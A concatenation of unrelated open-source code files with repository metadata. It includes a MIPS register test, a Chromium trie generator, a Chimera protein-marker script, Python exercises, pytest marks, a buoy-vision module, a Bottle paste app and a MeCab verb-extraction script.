self.assertRegisterEqual(self.MIPS.c17.offset, self.MIPS.t0 - 8, "return address offset wrong")
def test_cjalr_jump_cap_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.c6.offset, self.MIPS.t0, "jump cap modified by cjalr?")
self.assertRegisterEqual(self.MIPS.c12.offset, self.MIPS.t0, "jump cap modified by cjalr?")
def test_jalr_return_addr_in_delay_slot(self):
'''Test that the new value of $ra is available in the delay slot'''
self.assertRegisterEqual(self.MIPS.a0, self.MIPS.t9 - 8, "return address wrong")
def test_jalr_return_addr_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.a1, self.MIPS.t9 - 8, "return address wrong")
def test_jalr_jump_addr_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.a2, self.MIPS.t9, "jump address modified by jalr?")
|
[
"[email protected]"
] | |
a5133468f1e3ac2b8f5cff07596ef2a408f55caf
|
90047daeb462598a924d76ddf4288e832e86417c
|
/third_party/WebKit/Source/build/scripts/make_element_lookup_trie.py
|
89b0d36b65ea2270b86f8b56a979d0c65b744131
|
[
"BSD-3-Clause",
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0"
] |
permissive
|
massbrowser/android
|
99b8c21fa4552a13c06bbedd0f9c88dd4a4ad080
|
a9c4371682c9443d6e1d66005d4db61a24a9617c
|
refs/heads/master
| 2022-11-04T21:15:50.656802 | 2017-06-08T12:31:39 | 2017-06-08T12:31:39 | 93,747,579 | 2 | 2 |
BSD-3-Clause
| 2022-10-31T10:34:25 | 2017-06-08T12:36:07 | null |
UTF-8
|
Python
| false | false | 3,206 |
py
|
#!/usr/bin/env python
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import json5_generator
import trie_builder
import template_expander
class ElementLookupTrieWriter(json5_generator.Writer):
# FIXME: Inherit all these from somewhere.
default_parameters = {
'JSInterfaceName': {},
'constructorNeedsCreatedByParser': {},
'interfaceName': {},
'noConstructor': {},
'runtimeEnabled': {},
}
default_metadata = {
'attrsNullNamespace': None,
'export': '',
'fallbackInterfaceName': '',
'fallbackJSInterfaceName': '',
'namespace': '',
'namespacePrefix': '',
'namespaceURI': '',
}
def __init__(self, json5_file_paths):
super(ElementLookupTrieWriter, self).__init__(json5_file_paths)
self._tags = {}
for entry in self.json5_file.name_dictionaries:
self._tags[entry['name']] = entry['name']
self._namespace = self.json5_file.metadata['namespace'].strip('"')
self._outputs = {
(self._namespace + 'ElementLookupTrie.h'): self.generate_header,
(self._namespace + 'ElementLookupTrie.cpp'): self.generate_implementation,
}
@template_expander.use_jinja('ElementLookupTrie.h.tmpl')
def generate_header(self):
return {
'namespace': self._namespace,
}
@template_expander.use_jinja('ElementLookupTrie.cpp.tmpl')
def generate_implementation(self):
return {
'namespace': self._namespace,
'length_tries': trie_builder.trie_list_by_str_length(self._tags)
}
if __name__ == '__main__':
json5_generator.Maker(ElementLookupTrieWriter).main()
|
[
"[email protected]"
] | |
479010e4fad3411f3a48f4aa6eaecd7dc3742c2c
|
711756b796d68035dc6a39060515200d1d37a274
|
/output_cog/optimized_19878.py
|
19e72df929151a150c4f3942a521b27edb39e709
|
[] |
no_license
|
batxes/exocyst_scripts
|
8b109c279c93dd68c1d55ed64ad3cca93e3c95ca
|
a6c487d5053b9b67db22c59865e4ef2417e53030
|
refs/heads/master
| 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,835 |
py
|
import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((556.085, 428.39, 469.706), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((522.683, 408.322, 528.049), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((491, 389.643, 599.764), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((614.33, 456.002, 591.264), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((391.952, 311.915, 747.316), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((539.587, 406.108, 506.89), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((539.93, 405.777, 506.221), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((567.991, 403.819, 507.598), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((591.705, 391.342, 499.042), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((577.872, 382.64, 476.166), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((594.472, 360.934, 482.623), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((597.449, 334.717, 492.222), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((534.085, 420.47, 482.884), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((655.571, 245.945, 498.176), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((511.374, 221.618, 637.706), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((511.374, 221.618, 637.706), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((510.236, 247.271, 624.959), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((507.143, 273.61, 614.12), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((500.039, 298.984, 603.06), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((500.748, 319.493, 583.238), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((511.7, 338.732, 565.417), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((512.483, 357.398, 543.873), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((656.08, 162.675, 633.89), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((374.608, 552.516, 441.659), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((477.089, 361.632, 561.702), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((477.089, 361.632, 561.702), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((496.418, 361.684, 583.889), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((518.501, 373.153, 599.897), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((521.414, 402.442, 604.565), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((575.91, 465.22, 510.457), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((463.021, 354.292, 703.605), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((542.933, 427.935, 530.159), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((542.954, 427.971, 530.161), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((523.824, 435.564, 509.471), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((507.689, 413.631, 499.407), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((516.064, 389.242, 488.125), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((536.362, 369.807, 486.536), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((546.828, 344.117, 481.772), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((569.164, 327.702, 476.702), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((489.108, 356.777, 483.147), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((652.389, 300.145, 473.049), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((466.901, 390.5, 505.552), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((482.232, 398.256, 525.075), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((516.21, 416.998, 567.358), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((550.267, 435.765, 609.783), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((559.526, 500.618, 561.588), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((588.271, 413.593, 704.678), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((508.91, 435.368, 474.056), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((489.93, 441.714, 494.499), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((479.357, 436.253, 520.525), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((469.575, 432.37, 547.203), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((461.879, 427.467, 574.552), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((457.673, 421.373, 602.613), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((498.031, 418.352, 533.785), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((418.154, 422.745, 675.418), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
|
[
"[email protected]"
] | |
92e7550f33ce661e0dfbc7c4973a08bffc0e7f60
|
f177033785079d752502a6f91035e645b52d6416
|
/env/lib/python3.7/enum.py
|
feea8108d76bd633dc5f062b86b413107e416625
|
[] |
no_license
|
ousamasama/Django-Exercise-14
|
18d00d563e29df7804664ac33cd1de5966a10126
|
ecd023c2915e5c3b85614d857c916cd6a2b36316
|
refs/heads/master
| 2020-04-17T19:40:05.540532 | 2019-01-24T21:22:32 | 2019-01-24T21:22:32 | 166,873,826 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 55 |
py
|
/Users/sama/.pyenv/versions/3.7.1/lib/python3.7/enum.py
|
[
"[email protected]"
] | |
891f93e7f6991eb5a01701d37ad594831e3e606d
|
468eacfd3e5e20e15ba4c98a136ff6aca4431a73
|
/Labs/oop-1-employees.py
|
f6e9c036c60148fddabccfd73e0aa4f5cdca2148
|
[] |
no_license
|
DREAMS-lab/SES230-Coding-for-Exploration
|
b9888d837472efa33bc6047faa8ffd1fce00cb43
|
f799b6c2fe7f199fed5dc33f2f6e69ca2e06dbc9
|
refs/heads/master
| 2023-01-07T20:54:04.465586 | 2020-11-11T16:56:01 | 2020-11-11T16:56:01 | 312,028,818 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 746 |
py
|
class Employee:
"""Fill in the details"""
def __init__(self, _name='John Doe', _title='nothing', _salary=0):
self.__name = _name
self.title = _title
self.salary = _salary
def __str__(self):
return self.__name + ' ' + self.title + ' ' + str(self.salary)
def get_name(self):
"""return the name of the employee"""
return self.__name
def set_salary(self, _salary):
"""Changes the salary of the employee"""
self.salary = _salary
employee3 = Employee()
print(employee3)
scrooge_and_marley_employees = [(Employee("Bob Cratchit", 'clerk', 15)), (Employee('Ebenezer', 'founder', 1000))]
for employee in scrooge_and_marley_employees:
print(employee.get_name())
|
[
"[email protected]"
] | |
13f6a301539f7a1edd24c3d259ad5391980283c4
|
4d40ea521582b88a8373845cd47c94c2fdd3125c
|
/src/chapter3/test_marks.py
|
b7eca7c90cb009bd26faa006a0ed26bee72803e4
|
[] |
no_license
|
lancelote/pytest-quick-start-guide
|
a74d01ae322f798e7e1fa4f54ad2432f42d6747f
|
b76f515b5f4034f195b294e4e13befbad4790d1b
|
refs/heads/master
| 2020-03-29T14:19:17.725110 | 2018-11-07T10:01:31 | 2018-11-07T10:01:31 | 150,010,679 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 638 |
py
|
import pytest
@pytest.mark.slow
def test_long_computation():
pass
@pytest.mark.timeout(10, method='thread')
def test_topology_sort():
pass
@pytest.mark.slow
@pytest.mark.timeout(10, method='thread')
def test_topology_sort_slow():
pass
timeout10 = pytest.mark.timeout(10, method='thread')
@timeout10
def test_topology_sort_deco():
pass
@timeout10
def test_remove_duplicate_point():
pass
@timeout10
class TestCase:
def test_simple_simulation(self):
pass
def test_compute_tracers(self):
pass
# To apply a mark to a module
pytestmark = [pytest.mark.slow, pytest.mark.timeout(10)]
|
[
"[email protected]"
] | |
120fce3b3efd1034b3432b64e7fb3e599460cce4
|
f67986550761cf3ed174d01063f5fdc8a26f59f3
|
/vision/modules/YellowBuoy.py
|
8f6cbc2d3f99cd730e91568440d78e8e8c8c7b08
|
[
"BSD-3-Clause"
] |
permissive
|
wpfhtl/software
|
4dd5d116a1c90660264b32006617a6809b0a530e
|
575d424be6b497e0f34f7297a9b322567c2e26c0
|
refs/heads/master
| 2021-01-23T02:40:49.542461 | 2016-04-15T04:16:21 | 2016-04-15T04:16:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 856 |
py
|
import shm
from vision.modules import ModuleBase, buoy_common
from vision import options
capture_source = 'forward'
options = [options.IntOption('hls_h_min', 105, 0, 255),
options.IntOption('hls_h_max', 143, 0, 255),
options.IntOption('lab_a_min', 127, 0, 255),
options.IntOption('lab_a_max', 235, 0, 255),
options.IntOption('lab_b_min', 3, 0, 255),
options.IntOption('lab_b_max', 123, 0, 255),
options.IntOption('min_area', 100, 0, 1000000),
options.DoubleOption('min_circularity', 0.5, 0, 1),
options.BoolOption('verbose', False)
]
class YellowBuoy(ModuleBase.ModuleBase):
def __init__(self, logger):
super(YellowBuoy, self).__init__(options, True)
def process(self, mat):
buoy_common.process(self, mat, shm.yellow_buoy_results)
|
[
"[email protected]"
] | |
4e050d2bbdac743366012d0ff8e56b35566b6b0e
|
bbc7d39cea6dadae9b2ffb114c8474c9c3b6d305
|
/main.py
|
885f10bc222b0b9e40e7bbd1e9cc7f2d1ce9c6d6
|
[] |
no_license
|
jfriedly/paste-math
|
0018890c5bab2dd31a817a3aca6ac020c7e9613c
|
0b171433fee5aefd562cfd730f969cf931ce86c1
|
refs/heads/master
| 2021-01-16T00:49:49.269091 | 2013-02-19T22:34:48 | 2013-02-19T22:34:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,623 |
py
|
from lib import bottle
from lib.bottle import route, template, request, error, debug, static_file
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api.app_identity import get_default_version_hostname
import lib.db
from lib.html import addLineBreaks
from google.appengine.api import users
import datetime
import logging
today=datetime.datetime.today
class Object():
pass
@route('/')
def index():
if not users.is_current_user_admin():
q = lib.db.q("SELECT * FROM Page WHERE published = True ORDER BY timestamp DESC")
#q = lib.db.Page.all()
result = [[p.url, p.title] for p in q.run()]
output = template('templates/index', rows=result, users=users)
else:
#result = lib.db.q("SELECT * FROM Page")
q = lib.db.Page.all()
q.order('-timestamp')
todo = lib.db.Todo.all()
result = [[p.url, p.title, p.published] for p in q.run()]
output = template('templates/admin', rows=result, users=users, todo=todo)
return output
@route('/show/:name')
def show(name):
if not users.is_current_user_admin():
pass
q = lib.db.Page.gql("WHERE url = :1", name)
p = q.get()
if not p:
p = Object()
p.title = "Unknown Page"
p.content = "This page does not exist."
title = p.title
content = addLineBreaks(p.content)
return template('templates/show_page.tpl', title=title, body=content)
#content = convertList(lst)
@route('/view/:name')
def view(name):
q = lib.db.Page.gql("WHERE url = :1", name)
p = q.get()
if not p:
p = Object()
p.title = "Unknown Page"
p.content = "This page does not exist."
title = p.title
content = addLineBreaks(p.content)
return template('templates/view_page.tpl', title=title, body=content)
#content = convertList(lst)
@route('/new', method='GET')
def new():
return template('templates/new_preview.tpl')
@route('/new', method='POST')
def new_post():
if request.POST.get('save','').strip():
title = request.POST.get('title', '').strip()
data = request.POST.get('data', '').strip()
url = lib.db.getUrlString()
lib.db.Page(title=title, content=data, url=url, published=False, timestamp=today()).put()
message = '<p>The new page was inserted into the database, \
the ID is %s</p>' % (url)
return template('templates/submit.tpl', body=message,
data=addLineBreaks(data), title=title, url=url)
elif request.POST.get('publish','').strip():
title = request.POST.get('title', '').strip()
data = request.POST.get('data', '').strip()
url = lib.db.getUrlString()
lib.db.Page(title=title, content=data, url=url, published=True, timestamp=today()).put()
message = '<p>The new page was inserted into the database, \
the ID is %s</p>' % (url)
return template('templates/submit.tpl', body=message,
data=addLineBreaks(data), title=title, url=url)
@route('/todo', method='GET')
def new():
body = '''
<p>Add a new task to the ToDo list:</p>
<form action="/todo" method="POST">
Title: <br>
<input type="text" name="title"><br>
Body: <br>
<textarea name="data" cols="80" rows="20">
</textarea>
<br />
<input type="submit" name="save" value="save">
</form>
'''
return template('templates/simple.tpl', body=body)
@route('/todo', method='POST')
def new_post():
if request.POST.get('save','').strip():
title = request.POST.get('title', '').strip()
data = request.POST.get('data', '').strip()
lib.db.Todo(title=title, content=data, open=True).put()
message = '<p>The new task was inserted into the database</p>'
return template('templates/simple.tpl', body=message)
@route('/edit/:name', method='GET')
def edit(name):
q = lib.db.Page.gql("WHERE url = :1", name)
p = q.get()
if not p:
p = Object()
p.title = ""
p.content = ""
title = p.title
content = p.content
#lib.db.d(p)
return template('templates/edit_preview.tpl', name=name, body=content, url=name, title=title, data=addLineBreaks(content))
#@route('/edit_old/:name', method='GET')
#def edit(name):
# q = lib.db.Page.gql("WHERE url = :1", name)
# p = q.get()
# title = p.title
# content = p.content
# return template('templates/edit_active.tpl', name=name, body=content, url=name, title=title)
@route('/edit/:name', method='POST')
def edit_post(name):
if request.POST.get('save','').strip():
title = request.POST.get('title', '').strip()
data = request.POST.get('data', '').strip()
url = request.POST.get('url', '').strip()
q = lib.db.Page.gql("WHERE url = :1", name)
p = q.get()
lib.db.d(p)
if url == name:
message = '<p>The ID %s was successfully updated</p>' % (url)
#lib.db.q('UPDATE Page SET url = ?, data = ? WHERE url = :1', url)
else:
message = '<p>The new task was inserted into the database, the ID is %s</p>' % (url)
#lib.db.Page(title=title, content=data, url=url).put()
lib.db.Page(title=title, content=data, url=url, published=False, timestamp=today()).put()
return template('templates/submit.tpl', body=message,
data=addLineBreaks(data), title=title, url=url)
elif request.POST.get('publish','').strip():
title = request.POST.get('title', '').strip()
data = request.POST.get('data', '').strip()
url = request.POST.get('url', '').strip()
q = lib.db.Page.gql("WHERE url = :1", name)
p = q.get()
lib.db.d(p)
if url == name:
message = '<p>The ID %s was successfully updated</p>' % (url)
#lib.db.q('UPDATE Page SET url = ?, data = ? WHERE url = :1', url)
else:
message = '<p>The new task was inserted into the database, the ID is %s</p>' % (url)
#lib.db.Page(title=title, content=data, url=url).put()
lib.db.Page(title=title, content=data, url=url, published=True, timestamp=today()).put()
return template('templates/submit.tpl', body=message,
data=addLineBreaks(data), title=title, url=url)
@route('/help')
def help():
static_file('help.html', root='.')
@route('/static/<filename>')
def static(filename):
return static_file(filename, root='static')
@route('/json:json#[1-9]+#')
def show_json(json):
conn = sqlite3.connect('math.db')
c = conn.cursor()
c.execute("SELECT data FROM paste WHERE id LIKE ?", (json))
result = c.fetchall()
c.close()
if not result:
return {'task':'This item number does not exist!'}
else:
return {'Task': result[0]}
def main():
#Find a way to check if dev server.
if get_default_version_hostname() == 'localhost:8080':
debug(True)
else:
@error(500)
def Error500(code):
logging.error('There was an internal server error')
message = 'Internal Server Error'
return template('templates/simple.tpl', body=message)
run_wsgi_app(bottle.default_app())
@error(403)
def Error403(code):
logging.warning('There was a 403')
message = 'Get your codes right dude, you caused some error!'
return template('templates/simple.tpl', body=message)
@error(404)
def Error404(code):
logging.warning('There was a 404')
message = 'Stop cowboy, what are you trying to find?'
return template('templates/simple.tpl', body=message)
if __name__=="__main__":
main()
|
[
"[email protected]"
] | |
a3bc08a2eea2aaf15b870cf2f660a74a25c7333c
|
e79888cd68177e7ec5125270cdc52f888e211e78
|
/kiyuna/chapter04/knock32.py
|
4831c290a1a6a476a9d47fec6053cfb790a309a1
|
[] |
no_license
|
cafenoctua/100knock2019
|
ec259bee27936bdacfe0097d42f23cc7500f0a07
|
88717a78c4290101a021fbe8b4f054f76c9d3fa6
|
refs/heads/master
| 2022-06-22T04:42:03.939373 | 2019-09-03T11:05:19 | 2019-09-03T11:05:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 590 |
py
|
'''
32. 動詞の原形
動詞の原形をすべて抽出せよ.
'''
import sys
from knock30 import mecab_into_sentences
def message(text):
sys.stderr.write(f"\33[92m{text}\33[0m\n")
if __name__ == '__main__':
tgt = '動詞'
res = []
for sentence in mecab_into_sentences():
# メモリには優しくないが,ネストは深くならない
res.extend([d['base'] for d in sentence if d['pos'] == tgt])
message(f'{tgt}の原形の数: {len(res)}')
message(f'{tgt}の原形の種類: {len(set(res))}')
print('上から10個 ->', *res[:10])
|
[
